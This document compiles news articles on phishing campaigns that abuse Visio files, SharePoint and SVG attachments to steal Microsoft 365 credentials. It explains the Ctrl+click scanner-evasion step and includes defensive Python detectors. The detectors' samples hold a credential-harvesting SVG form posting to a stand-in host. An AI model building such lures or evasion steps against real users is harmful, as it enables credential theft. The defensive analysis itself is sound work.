
New Two-Step Phishing Attack Exploits Microsoft Visio and SharePoint

 

A novel two-step phishing strategy is targeting Microsoft Visio files (.vsdx) and SharePoint, signaling a new trend in cyber deception, according to experts. Researchers at Perception Point have noted a significant rise in attacks leveraging these previously uncommon .vsdx files.

These files act as delivery tools, directing victims to phishing pages that replicate Microsoft 365 login portals, aiming to steal user credentials.

The two-step phishing attacks employ layered techniques to evade detection. Rather than delivering harmful content directly, these campaigns use trusted platforms like Microsoft SharePoint to host files that appear legitimate. Attackers embed URLs within Visio files, which redirect victims to malicious websites when clicked, bypassing traditional email security systems.

Microsoft Visio, a popular tool for professional diagram creation, has now become a phishing vector. Cybercriminals send emails with Visio files from compromised accounts, often mimicking urgent business communications such as proposals or purchase orders. This tactic encourages recipients to act quickly, increasing the likelihood of success.

Since the emails come from stolen accounts, they often pass authentication checks and evade recipient security filters. In some cases, attackers include .eml files within the emails, embedding additional malicious URLs linked to SharePoint-hosted files.

The Visio files typically contain a clickable button labeled "View Document." Victims are instructed to press the Ctrl key while clicking the button to access the malicious URL. This step, requiring manual interaction, bypasses automated security systems that cannot simulate such behaviors.

Perception Point advises organizations to strengthen their defenses against sophisticated phishing campaigns by adopting advanced threat detection solutions. Suggested measures include:

  • Dynamic URL analysis to identify harmful links.
  • Object detection models to flag suspicious files.
  • Enhanced authentication mechanisms to reduce the impact of compromised accounts.

Cybercriminals Exploit Two-Step Phishing Tactics and SVG Attachments in Sophisticated Cyber Attacks

 

Layered defense strategies are a cornerstone of cybersecurity, but attackers are employing similar methods to launch sophisticated attacks. Two-step phishing (2SP) tactics are becoming increasingly prevalent, leveraging trusted platforms to deliver malicious content in layers and evade detection, according to researchers at Perception Point.

These researchers have identified a new wave of 2SP attacks weaponising Microsoft Visio (.vsdx) files. Peleg Cabra, product marketing manager at Perception Point, shared that Ariel Davidpur, a security researcher at the firm, uncovered an alarming trend: attackers are embedding malicious URLs within Visio files to bypass security systems.

Visio, widely used in workplaces for data visualization, plays into the attackers' strategy of exploiting familiarity. The files are being used in phishing emails containing urgent business-related requests. Once the recipient engages with these emails and accesses the Visio file, they encounter another embedded URL disguised as a clickable button, like “view document.”

Perception Point’s analysis highlights how attackers ask victims to hold the Ctrl key while clicking the URL, bypassing automated detection tools. This redirects users to a fake Microsoft 365 login page designed to steal credentials. Robust two-factor authentication is recommended to mitigate the risks of such attacks.

Additionally, a report by Lawrence Abrams from Bleeping Computer reveals another alarming technique: attackers are leveraging scalable vector graphics (SVG) files. These files, capable of displaying HTML and executing JavaScript, are being used to deliver phishing forms and malware. Security researcher MalwareHunterTeam demonstrated how SVG attachments could mimic an Excel spreadsheet with an embedded login form to harvest credentials.

To counter these threats, cybersecurity experts recommend treating SVG attachments with suspicion and implementing stringent email security measures.
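As an added example (not from the Bleeping Computer report or the original post), the following Python sketch shows what treating SVG attachments with suspicion can look like in a mail pipeline: it flags SVG files that carry script, embedded HTML forms, or event handlers instead of plain graphics. The tag list, function names and both sample files are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Elements that make an SVG behave like a web page rather than an image.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "form", "input"}

def local(name):
    """Strip an XML namespace: '{ns}tag' -> 'tag', lowercased."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data):
    """Return a sorted list of reasons an SVG attachment carries active content."""
    if b"<!ENTITY" in data.upper():
        # Refuse to parse entity declarations (entity-expansion risk).
        return ["entity declaration (not parsed)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    reasons = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            reasons.add(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):
                reasons.add(f"event handler {name}")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                reasons.add("javascript: link")
    return sorted(reasons)

# Constructed samples: a plain drawing and an SVG wrapping an HTML login form.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'
SUSPICIOUS = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="init()">'
              b'<foreignObject width="300" height="200">'
              b'<form xmlns="http://www.w3.org/1999/xhtml"'
              b' action="https://collector.example.invalid/">'
              b'<input type="password" name="p"/></form></foreignObject>'
              b'<script>function init(){}</script></svg>')

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, svg_findings(sample))
```

Any non-empty result is a reason to quarantine the attachment or strip it before delivery, since a legitimate image needs none of these features.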

International Fraud Awareness Week, held from November 17 to 23, 2024, aims to raise awareness of evolving cyber fraud. Muhammad Yahya Patel, lead security engineer at Check Point Software, warns that technological advancements empower both legitimate industries and cyber criminals.

Patel categorizes the major fraud types businesses should watch out for:
  • Cyber Fraud: Using phishing, malware, and ransomware to steal sensitive data.
  • Internal Fraud: Involving employee-driven actions like embezzlement and theft.
  • Invoice Fraud: Sending fake invoices to businesses for payment.
  • CEO Fraud: Impersonating executives to extract sensitive information.
  • Return Fraud: Exploiting return policies in retail for financial gain.
  • Payroll Fraud: Manipulating payroll systems to benefit employees fraudulently.

Ransomware has also evolved from untargeted attacks to highly strategic campaigns, employing reconnaissance and double-extortion tactics. As cyber threats grow more sophisticated, businesses must remain vigilant, adopt robust security practices, and foster awareness to combat evolving fraud.

Phishing Scams use Microsoft Visio Files to Steal Information

 


A recent wave of phishing attacks uses Microsoft Visio files to steal users' private information. According to the security firm Perception Point, the trick relies mainly on the .vsdx file format, which is used for business diagrams and flowcharts. Attackers embed malicious links in Visio files to get past most of the traditional checks that security systems perform.


Why Visio files are a hacker's best friend

Users encounter Microsoft Visio files less often than better-known attachment types such as PDFs or Word documents. As a result, security systems are less likely to treat Visio files as suspicious, which makes them attractive to attackers who want to deliver phishing links unnoticed. In addition, Visio files arrive as email attachments, which most users trust because they come from Microsoft tools.


How the Visio Phishing Attack Works


This is how the particular phishing scheme unfolds, according to Perception Point:

1. Accessed Accounts: Scammers first gain access to a legitimate account so they can use it to send their phishing email. This gives them a head start over basic security checks, since the email comes from a trusted source.

2. Email Content: The email carries an attachment, either a Visio file (.vsdx) or an Outlook email (.eml), that looks authentic, typically a proposal or a purchase order.

3. Opening the File: As soon as the recipient clicks on the attachment to open it, they are taken to a SharePoint page serving the Visio file. The attackers add the compromised organisation's logos to make the document look authentic.

4. Link in Visio document: Attackers add a link titled "View Document" inside the Visio document. Users are told to hold the Ctrl key while clicking the link, a step that is thought to bypass many forms of automated security scanning. Once they have clicked, victims are taken to a mock Microsoft login page that prompts them for their passwords, which are then stolen.


Phishing by Trusted Platforms

As Perception Point reports, phishing attacks using trusted Microsoft tools, SharePoint and Visio, have been rising alarmingly. Using credible tools creates layers of trust, which reduces the chance that the phishing is detected. Thus, Microsoft has warned users to look out for the potential abuse of its tools in phishing scams.

According to Perception Point, this phishing method relies on trusted Microsoft tools such as Visio and SharePoint, which shows how cybercriminals adapt to evade detection. The methods are designed to gain user trust and slip past traditional email security systems.

Recommended Security Best Practices

The following best practices help both organizations and individual users mitigate such advanced phishing:

  • Verify the sender: Confirm the sender's identity before opening attachments from unknown or unfamiliar contacts.
  • Enable multi-factor authentication: Multi-factor authentication adds an extra layer of security that makes it much harder for attackers to access your accounts.
  • Stay updated on phishing techniques: Educate employees to recognize and avoid phishing attempts.
  • Advanced Email Security Tools: Implement tools specifically designed to monitor unusual file types, including Visio files, in order to detect emerging phishing strategies.
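As an added example (not from Perception Point or the original post), the following Python sketch applies the last recommendation to the attack steps described above: it opens a .vsdx attachment as the ZIP package it is and lists every URL in its XML parts whose host falls outside an allowlist. The sample package, the `contoso.example` allowlist entry and all function names are constructed for illustration.

```python
import io
import re
import zipfile
from urllib.parse import urlsplit

# Hosts of XML namespace URIs found in Office packages; these are not links.
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com",
                "www.w3.org", "purl.org"}
URL_RE = re.compile(rb"https?://[^\s\"'<>]+", re.IGNORECASE)

def host_of(url):
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:  # malformed authority in hostile input
        return ""

def extract_urls(vsdx_bytes):
    """Map each non-schema URL in the package's XML parts to the parts holding it."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(vsdx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            for raw in URL_RE.findall(pkg.read(name)):
                url = raw.decode("utf-8", "replace").replace("&amp;", "&")
                if host_of(url) not in SCHEMA_HOSTS:
                    found.setdefault(url, []).append(name)
    return found

def flag_untrusted(urls, trusted_domains):
    """Return URLs whose host is neither a trusted domain nor a subdomain of one."""
    def trusted(host):
        return any(host == d or host.endswith("." + d) for d in trusted_domains)
    return sorted(u for u in urls if not trusted(host_of(u)))

def build_sample():
    """Constructed sample: a minimal ZIP shaped like a .vsdx with one shape link."""
    page = ('<PageContents xmlns="http://schemas.microsoft.com/office/visio/2012/main">'
            '<Shapes><Shape ID="1"><Section N="Hyperlink"><Row N="Row_1">'
            '<Cell N="Description" V="View Document"/>'
            '<Cell N="Address" V="https://login.example.invalid/o365?id=1&amp;r=2"/>'
            '</Row></Section></Shape></Shapes></PageContents>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("visio/pages/page1.xml", page)
    return buf.getvalue()

if __name__ == "__main__":
    links = extract_urls(build_sample())
    print(flag_untrusted(links, {"contoso.example"}))
```

Because the check reads the link out of the file itself, it does not depend on anyone performing the Ctrl+click that automated scanners cannot simulate.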

With phishing scams constantly evolving, staying informed and keeping security protocols up to date goes a long way.